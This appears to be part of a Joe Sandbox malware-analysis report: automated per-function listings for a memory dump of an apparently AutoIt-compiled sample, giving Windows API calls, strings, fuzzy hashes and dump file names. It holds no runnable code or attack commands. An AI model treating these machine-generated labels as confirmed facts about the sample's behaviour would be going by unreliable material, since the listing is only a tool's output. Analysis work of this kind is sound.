                                            APIs
                                            • GetWindowTextLengthW.USER32(00000000), ref: 00E96C11
                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E96C20
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: LengthMessageSendTextWindow
                                            • String ID: edit
                                            • API String ID: 2978978980-2167791130
                                            • Opcode ID: 59ee3a5fbd8a632493d612f8091364f458a3bc806fb95b2adef079f25ff20e88
                                            • Instruction ID: 44e2e2adbab42ae1ba48b3848914c76a61f99cb0866b0f88a4cb92d6a625df3d
                                            • Opcode Fuzzy Hash: 59ee3a5fbd8a632493d612f8091364f458a3bc806fb95b2adef079f25ff20e88
                                            • Instruction Fuzzy Hash: 89116A71501208AFEF108E64DC45AEA37A9EB04368F605726F961E71E0E775DC919B60
                                            Function 00E72E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00E72F11
                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E72F30
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: InfoItemMenu_memset
                                            • String ID: 0
                                            • API String ID: 2223754486-4108050209
                                            • Opcode ID: 89428a10ef72f2d43dda993e3ae9b5cfe23e004d516cd6affc3e0e389356c679
                                            • Instruction ID: 0af68bde849c90788d8401d9e35f0c5f94f61aca6ff14edf86e0a6b491897764
                                            • Opcode Fuzzy Hash: 89428a10ef72f2d43dda993e3ae9b5cfe23e004d516cd6affc3e0e389356c679
                                            • Instruction Fuzzy Hash: A311B231E01214AFDB39DB58DC44B9977B9EB05318F1490AAEA58B72A0D7B0AD05C791
                                            Function 00E824CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E82520
                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E82549
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Internet$OpenOption
                                            • String ID: <local>
                                            • API String ID: 942729171-4266983199
                                            • Opcode ID: a310b8f7f70f7519112b5c681eafc137c96d721c999bff96da4d3fffd7e4752b
                                            • Instruction ID: 1cb51937d588322f631dcf62f25ead2d0083083fc283dc6739f2943dbe66dfdc
                                            • Opcode Fuzzy Hash: a310b8f7f70f7519112b5c681eafc137c96d721c999bff96da4d3fffd7e4752b
                                            • Instruction Fuzzy Hash: 5011CEB0540225BADB24AF618C98EFBFF68EB06365F10912FFA0DA6040D2706945DBB1
                                            Function 00E880A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E8830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E880C8,?,00000000,?,?), ref: 00E88322
                                            • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E880CB
                                            • htons.WSOCK32(00000000,?,00000000), ref: 00E88108
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                            • String ID: 255.255.255.255
                                            • API String ID: 2496851823-2422070025
                                            • Opcode ID: 44ee800bed1fc3f832645dcfbb04ae1c69be7f293f729189091f62241699f15c
                                            • Instruction ID: 06ad4173c53528ee63367981ea1cc34a70fbeb0462d3ead1daa6bb3d7e7459c1
                                            • Opcode Fuzzy Hash: 44ee800bed1fc3f832645dcfbb04ae1c69be7f293f729189091f62241699f15c
                                            • Instruction Fuzzy Hash: 4B11C235540205ABDB20AFA4DD46FEEB364EF44314F109527E919B7291DE32A8058791
                                            Function 00E20A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E13C26,00ED62F8,?,?,?), ref: 00E20ACE
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            • _wcscat.LIBCMT ref: 00E550E1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FullNamePath_memmove_wcscat
                                            • String ID: c
                                            • API String ID: 257928180-921687731
                                            • Opcode ID: a6939b5eaf830b7d4d1d02a371de9378b443d1b03ec5a34872f1f0945f75748c
                                            • Instruction ID: 6e1b803da6f9a6664445be9f204d9b827e046b77b74cf2f49351fb38123e70b3
                                            • Opcode Fuzzy Hash: a6939b5eaf830b7d4d1d02a371de9378b443d1b03ec5a34872f1f0945f75748c
                                            • Instruction Fuzzy Hash: A4118C3590421C9F8B10EBA4EC42DDD77F8EF48354B0120A6B988F7291DA70DBC98711
                                            Function 00E692E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E69355
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassMessageNameSend_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 372448540-1403004172
                                            • Opcode ID: cb5d495ebc6c5e2bd52e315ad7305735a027b5e04d4614dce1cce52fca36456e
                                            • Instruction ID: aca00c3317c7e34d2c176f26f1bb300bfbb4aabb3ef4f1fcbd7f9304da939c31
                                            • Opcode Fuzzy Hash: cb5d495ebc6c5e2bd52e315ad7305735a027b5e04d4614dce1cce52fca36456e
                                            • Instruction Fuzzy Hash: E701F171A81214ABCB04EBA0CC91CFE77ADBF06360B10261AF872B73D2DB31584C8660
                                            Function 00E691DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E6924D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassMessageNameSend_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 372448540-1403004172
                                            • Opcode ID: e73c44a84551c722d4686afbd542ed946fb167f55e2fca07601aa19c5d33607e
                                            • Instruction ID: 004583db664f49a0f5413e4dc933d8a82da26970d79a56d98db222ee2a40eea3
                                            • Opcode Fuzzy Hash: e73c44a84551c722d4686afbd542ed946fb167f55e2fca07601aa19c5d33607e
                                            • Instruction Fuzzy Hash: 9701D871B81204BBCB14E7A0D996EFF77EC9F45740F142019B51273293EB215E4C8271
                                            Function 00E69264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                              • Part of subcall function 00E6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E6B0E7
                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E692D0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassMessageNameSend_memmove
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 372448540-1403004172
                                            • Opcode ID: 54cace0fb66c5fbd09fdaf8565e3d2aff353a8ebf46f941bafd0198e0cc9365f
                                            • Instruction ID: eee0e4926efcb40a0151f4011cdd4e17f9cd2c4779d60e9c6e64523fe765f266
                                            • Opcode Fuzzy Hash: 54cace0fb66c5fbd09fdaf8565e3d2aff353a8ebf46f941bafd0198e0cc9365f
                                            • Instruction Fuzzy Hash: D501A771A81204B7CB14E6A0D992EFF77EC9F15740F142116B812B3293DA315E4C9671
                                            Function 00E36DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __calloc_crt
                                            • String ID: @R
                                            • API String ID: 3494438863-2347139750
                                            • Opcode ID: 70fd7cc930359170e30f75abbf7188141781bdf15308f13e7d62808b67be1f73
                                            • Instruction ID: 67cd4e0e99aeb824c0063a26e41b8193e9f49dabc3769832120a0287aaf9dbe2
                                            • Opcode Fuzzy Hash: 70fd7cc930359170e30f75abbf7188141781bdf15308f13e7d62808b67be1f73
                                            • Instruction Fuzzy Hash: 69F04F71309716EFE7249B6AFD09BA12BD5EB50724F50942BE100FA2A0EB309889C684
                                            Function 00E751CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ClassName_wcscmp
                                            • String ID: #32770
                                            • API String ID: 2292705959-463685578
                                            • Opcode ID: 4c46312a5f1c54e5defb4b9c5460013e899a74887f41b45a655ff40e78344ecc
                                            • Instruction ID: 59a5720c43af394fd9fa3765c06ea73c1facdeaf466c2a535bfbba3b366fe21b
                                            • Opcode Fuzzy Hash: 4c46312a5f1c54e5defb4b9c5460013e899a74887f41b45a655ff40e78344ecc
                                            • Instruction Fuzzy Hash: 26E02B3250032C1AD7109695AC09FA7F7ECEB40761F00006BFD14E3050E560990587D1
                                            Function 00E681BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E681CA
                                              • Part of subcall function 00E33598: _doexit.LIBCMT ref: 00E335A2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Message_doexit
                                            • String ID: AutoIt$Error allocating memory.
                                            • API String ID: 1993061046-4017498283
                                            • Opcode ID: 501fbd87349a1468b249382675dae63b6531da9ca415db82b10f4514577af786
                                            • Instruction ID: f4fe82f8523ea1f1474b918c14f41da6ba7ce9c97849e0f3ff54a3ca765867c9
                                            • Opcode Fuzzy Hash: 501fbd87349a1468b249382675dae63b6531da9ca415db82b10f4514577af786
                                            • Instruction Fuzzy Hash: A5D05B323C531836D21832B56D0FFC57AC84F09B96F006066FB08B55D38DD299D282D9
                                            Function 00E4B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00E4B564: _memset.LIBCMT ref: 00E4B571
                                              • Part of subcall function 00E30B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E4B540,?,?,?,00E1100A), ref: 00E30B89
                                            • IsDebuggerPresent.KERNEL32(?,?,?,00E1100A), ref: 00E4B544
                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E1100A), ref: 00E4B553
                                            Strings
                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E4B54E
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                            • API String ID: 3158253471-631824599
                                            • Opcode ID: 0b075a5621ed5c177d37c4bac571bc1e96bb75cde63e058e6fdb4eb524c6d7f1
                                            • Instruction ID: 81f3e26298727710b0ec302df153fe3dcca85608228351fc0d03cf5f1a8592d9
                                            • Opcode Fuzzy Hash: 0b075a5621ed5c177d37c4bac571bc1e96bb75cde63e058e6fdb4eb524c6d7f1
                                            • Instruction Fuzzy Hash: 75E092702003108FD721DF2AE404387BBE4AF44744F009D2EE486E3760DBB8D448CB61
                                            Function 00E95BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E95BF5
                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E95C08
                                              • Part of subcall function 00E754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E7555E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FindMessagePostSleepWindow
                                            • String ID: Shell_TrayWnd
                                            • API String ID: 529655941-2988720461
                                            • Opcode ID: 11fd0d2ffe9960491b4001201b662262f6a9f73e20c5aab03a2543cd2f4ef3be
                                            • Instruction ID: 47ca1697f20e7096b0fcba7b477f9d24a57463091024bd1cfac0612e40c137a5
                                            • Opcode Fuzzy Hash: 11fd0d2ffe9960491b4001201b662262f6a9f73e20c5aab03a2543cd2f4ef3be
                                            • Instruction Fuzzy Hash: 2DD0A932388301BBE334AB31AC0BF932A10AB00B00F04083AB20AFA0D0D8E05800C240